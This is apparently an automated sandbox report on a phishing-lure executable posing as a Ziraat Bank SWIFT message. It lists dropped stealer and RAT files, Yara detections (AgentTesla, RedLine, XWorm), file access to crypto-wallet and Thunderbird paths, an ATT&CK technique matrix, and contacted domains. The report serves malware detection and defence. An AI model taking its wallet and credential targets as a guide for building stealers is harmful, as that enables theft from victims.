Source: C:\Users\user\AppData\Local\Temp\build.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\AppData\Local\Temp\build.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\
Source: C:\Users\user\AppData\Local\Temp\build.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\
Source: C:\Users\user\AppData\Local\Temp\build.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\AppData\Local\Temp\XClient.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini			Jump to behavior

Source: Yara match	File source: 8.2.XClient.exe.1d020000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.XClient.exe.1d020000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.XClient.exe.1cbe0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.XClient.exe.1cbe0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.XClient.exe.2ce4f08.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.2940708264.000000001D020000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2652391836.0000000002BAD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2623500553.00000000029C6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2939204623.000000001CBE0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2652391836.0000000002CBE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2652391836.00000000030CA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: XClient.exe PID: 2604, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: build.exe PID: 6508, type: MEMORYSTR

Remote Access Functionality

Yara detected AgentTesla

Source: Yara match	File source: 8.2.XClient.exe.1d020000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.XClient.exe.1d020000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.2940708264.000000001D020000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2652391836.0000000002CBE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: XClient.exe PID: 2604, type: MEMORYSTR

Yara detected MassLogger RAT

Source: Yara match	File source: 8.2.XClient.exe.1cbe0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.XClient.exe.1cbe0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.2939204623.000000001CBE0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: XClient.exe PID: 2604, type: MEMORYSTR

Yara detected Phoenix Stealer

Source: Yara match

File source: Process Memory Space: XClient.exe PID: 2604, type: MEMORYSTR

Yara detected PureLog Stealer

Source: Yara match	File source: 0.2.Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe.6f90000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe.6f90000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe.3c7e790.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe.3c7e790.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2144967005.0000000003C61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2148223816.0000000006F90000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY

Yara detected RedLine Stealer

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 8.2.XClient.exe.1d380000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe.41b07a0.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe.4246bf0.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.XClient.exe.1d380000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe.4246bf0.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe.41fb9d0.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.0.build.exe.590000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe.41b07a0.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe.41fb9d0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.2942525040.000000001D380000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000000.2120832413.0000000000592000.00000002.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2652391836.0000000002BAD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2130198719.00000000041E4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2130198719.0000000004164000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2130198719.000000000423E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe PID: 1436, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: XClient.exe PID: 2604, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: build.exe PID: 6508, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\build.exe, type: DROPPED

Yara detected Telegram RAT

Source: Yara match	File source: 8.2.XClient.exe.1cbe0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.XClient.exe.1cbe0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.XClient.exe.2ce4f08.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.2939204623.000000001CBE0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2652391836.0000000002CBE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: XClient.exe PID: 2604, type: MEMORYSTR

Yara detected XWorm

Source: Yara match	File source: 8.0.XClient.exe.8c0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.XClient.exe.2ce4f08.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.YkxAHNcqEmoeLS.exe.2a577e4.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe.31ad63c.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.YkxAHNcqEmoeLS.exe.2a4d588.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe.31b7898.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe.31a33f8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe.31b7898.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.YkxAHNcqEmoeLS.exe.2a577e4.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe.31a33f8.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.YkxAHNcqEmoeLS.exe.2a43344.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.YkxAHNcqEmoeLS.exe.2a4d588.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe.31ad63c.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.YkxAHNcqEmoeLS.exe.2a43344.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.XClient.exe.2ce4f08.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000000.2119570575.00000000008C2000.00000002.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2503972444.0000000002A01000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2652391836.0000000002CBE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2129069738.0000000003161000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2652391836.0000000002B21000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.4577783321.00000000029F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe PID: 1436, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: XClient.exe PID: 2604, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: YkxAHNcqEmoeLS.exe PID: 5852, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: apihost.exe PID: 7820, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\XClient.exe, type: DROPPED

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	331 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	111 Disable or Modify Tools	2 OS Credential Dumping	1 File and Directory Discovery	Remote Services	11 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Scheduled Task/Job	1 Scheduled Task/Job	112 Process Injection	1 Deobfuscate/Decode Files or Information	21 Input Capture	124 System Information Discovery	Remote Desktop Protocol	4 Data from Local System	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	21 Registry Run Keys / Startup Folder	1 Scheduled Task/Job	31 Obfuscated Files or Information	Security Account Manager	1 Query Registry	SMB/Windows Admin Shares	1 Email Collection	1 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	21 Registry Run Keys / Startup Folder	22 Software Packing	NTDS	441 Security Software Discovery	Distributed Component Object Model	21 Input Capture	2 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Timestomp	LSA Secrets	2 Process Discovery	SSH	1 Clipboard Data	123 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	351 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Masquerading	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	351 Virtualization/Sandbox Evasion	Proc Filesystem	1 System Network Configuration Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	112 Process Injection	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	61%	ReversingLabs	ByteCode-MSIL.Trojan.PureLogStealer
Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	42%	Virustotal		Browse
Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Roaming\XClient.exe	100%	Avira	TR/Dropper.Gen
C:\Users\user\AppData\Local\Temp\XClient.exe	100%	Avira	TR/Spy.Gen
C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	100%	Avira	TR/Dropper.Gen
C:\Users\user\AppData\Roaming\YkxAHNcqEmoeLS.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\build.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\XClient.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\XClient.exe	79%	ReversingLabs	ByteCode-MSIL.Spyware.AsyncRAT
C:\Users\user\AppData\Local\Temp\XClient.exe	68%	Virustotal		Browse
C:\Users\user\AppData\Local\Temp\build.exe	83%	ReversingLabs	ByteCode-MSIL.Trojan.RedLineStealz
C:\Users\user\AppData\Local\Temp\build.exe	75%	Virustotal		Browse

Source	Detection	Scanner	Label	Link
http://crl.microsG	0%	Avira URL Cloud	safe
http://wwcrosoft.com/pki/certs/MicWinPCA_2010-07-06.crt0	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
reallyfreegeoip.org	172.67.177.134	true	false	high
api.ipify.org	104.26.12.205	true	false	high
s82.gocheapweb.com	51.195.88.199	true	false	high
checkip.dyndns.com	193.122.6.168	true	false	high
checkip.dyndns.org	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://reallyfreegeoip.org/xml/8.46.123.75	false		high
https://api.ipify.org/	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://crl.microsG	powershell.exe, 00000015.00000002.2440580554.000001E8C45F0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Text	XClient.exe, 00000008.00000002.2652391836.0000000002CBE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000009.00000002.2623500553.00000000029C6000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/sc/sct	XClient.exe, 00000008.00000002.2652391836.0000000002CBE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000009.00000002.2623500553.00000000029C6000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/chrome_newtab	XClient.exe, 00000008.00000002.2692349903.000000001482B000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2692349903.0000000014FF1000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2692349903.0000000015288000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2692349903.0000000014AC3000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2692349903.0000000015520000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2692349903.00000000142FD000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2692349903.00000000131BA000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2692349903.0000000014594000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2652391836.000000000342B000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2692349903.0000000014D5A000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000009.00000002.2645035144.0000000004052000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000009.00000002.2645035144.0000000003ACE000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/04/security/sc/dk	XClient.exe, 00000008.00000002.2652391836.0000000002CBE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000009.00000002.2623500553.00000000029C6000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/ac/?q=	XClient.exe, 00000008.00000002.2692349903.000000001482B000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2692349903.000000001480F000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2692349903.000000001319F000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2692349903.0000000014578000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2692349903.0000000014FF1000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2692349903.0000000014AA7000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2692349903.00000000142E1000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2652391836.0000000003532000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2692349903.0000000015288000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2692349903.0000000014AC3000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2692349903.0000000015520000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2692349903.00000000142FD000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2692349903.000000001526D000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2692349903.0000000015506000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2692349903.00000000131BA000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2692349903.0000000014FD5000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2692349903.0000000014594000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2652391836.000000000342B000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2692349903.0000000014D3E000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2692349903.0000000014D5A000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000009.00000002.2645035144.0000000004036000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Entity/Id23ResponseD	build.exe, 00000009.00000002.2623500553.0000000002C63000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Entity/Id12Response	XClient.exe, 00000008.00000002.2652391836.0000000002BAD000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2652391836.0000000002CBE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000009.00000002.2623500553.0000000002931000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/	XClient.exe, 00000008.00000002.2652391836.0000000002BAD000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2652391836.0000000002CBE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000009.00000002.2623500553.0000000002931000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Entity/Id2Response	XClient.exe, 00000008.00000002.2652391836.0000000002BAD000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2652391836.0000000002CBE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000009.00000002.2623500553.0000000002931000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1	XClient.exe, 00000008.00000002.2652391836.0000000002CBE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000009.00000002.2623500553.00000000029C6000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Entity/Id21Response	XClient.exe, 00000008.00000002.2652391836.0000000002BAD000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000009.00000002.2623500553.0000000002931000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_Wrap	XClient.exe, 00000008.00000002.2652391836.0000000002CBE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000009.00000002.2623500553.00000000029C6000.00000004.00000800.00020000.00000000.sdmp	false		high
http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLID	XClient.exe, 00000008.00000002.2652391836.0000000002CBE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000009.00000002.2623500553.00000000029C6000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Entity/Id6ResponseD	build.exe, 00000009.00000002.2623500553.0000000002BEC000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecret	XClient.exe, 00000008.00000002.2652391836.0000000002CBE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000009.00000002.2623500553.00000000029C6000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue	XClient.exe, 00000008.00000002.2652391836.0000000002CBE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000009.00000002.2623500553.00000000029C6000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/10/wsat/Aborted	XClient.exe, 00000008.00000002.2652391836.0000000002CBE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000009.00000002.2623500553.00000000029C6000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence	XClient.exe, 00000008.00000002.2652391836.0000000002BAD000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000009.00000002.2623500553.0000000002931000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Entity/Id13ResponseD	build.exe, 00000009.00000002.2623500553.00000000029C6000.00000004.00000800.00020000.00000000.sdmp	false		high
https://nuget.org/nuget.exe	powershell.exe, 00000015.00000002.2419525298.000001E8BC113000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/10/wsat/fault	XClient.exe, 00000008.00000002.2652391836.0000000002CBE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000009.00000002.2623500553.00000000029C6000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/10/wsat	XClient.exe, 00000008.00000002.2652391836.0000000002CBE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000009.00000002.2623500553.00000000029C6000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Entity/Id15Response	XClient.exe, 00000008.00000002.2652391836.0000000002D9A000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000009.00000002.2623500553.0000000002931000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe, 00000000.00000002.2142691697.0000000002CA8000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2652391836.0000000002B21000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000009.00000002.2623500553.00000000029C6000.00000004.00000800.00020000.00000000.sdmp, YkxAHNcqEmoeLS.exe, 0000000A.00000002.2180779322.0000000002708000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2349952614.000001E8AC0A1000.00000004.00000800.00020000.00000000.sdmp, apihost.exe, 0000001B.00000002.4577783321.00000000029F1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Renew	XClient.exe, 00000008.00000002.2652391836.0000000002CBE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000009.00000002.2623500553.00000000029C6000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/10/wscoor/Register	XClient.exe, 00000008.00000002.2652391836.0000000002CBE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000009.00000002.2623500553.00000000029C6000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKey	XClient.exe, 00000008.00000002.2652391836.0000000002CBE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000009.00000002.2623500553.00000000029C6000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.ip.sb/ip	Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe, 00000007.00000002.2130198719.00000000041E4000.00000004.00000800.00020000.00000000.sdmp, Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe, 00000007.00000002.2130198719.000000000423E000.00000004.00000800.00020000.00000000.sdmp, Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe, 00000007.00000002.2130198719.0000000004164000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2942525040.000000001D380000.00000004.08000000.00040000.00000000.sdmp, XClient.exe, 00000008.00000002.2652391836.0000000002CBE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000009.00000000.2120832413.0000000000592000.00000002.00000001.01000000.0000000D.sdmp, build.exe, 00000009.00000002.2623500553.00000000029C6000.00000004.00000800.00020000.00000000.sdmp	false		high
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000015.00000002.2349952614.000001E8AC2C8000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000015.00000002.2349952614.000001E8AC2C8000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Entity/Id1ResponseD	build.exe, 00000009.00000002.2623500553.00000000029C6000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Cancel	XClient.exe, 00000008.00000002.2652391836.0000000002CBE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000009.00000002.2623500553.00000000029C6000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/Icon	powershell.exe, 00000015.00000002.2419525298.000001E8BC113000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	XClient.exe, 00000008.00000002.2692349903.000000001482B000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2692349903.000000001480F000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2692349903.000000001319F000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2692349903.0000000014578000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2692349903.0000000014FF1000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2692349903.0000000014AA7000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2692349903.00000000142E1000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2652391836.0000000003532000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2692349903.0000000015288000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2692349903.0000000014AC3000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2692349903.0000000015520000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2692349903.00000000142FD000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2692349903.000000001526D000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2692349903.0000000015506000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2692349903.00000000131BA000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2692349903.0000000014FD5000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2692349903.0000000014594000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2652391836.000000000342B000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2692349903.0000000014D3E000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2692349903.0000000014D5A000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000009.00000002.2645035144.0000000004036000.00000004.00000800.00020000.00000000.sdmp	false		high
http://checkip.dyndns.org	XClient.exe, 00000008.00000002.2652391836.0000000002B21000.00000004.00000800.00020000.00000000.sdmp	false		high
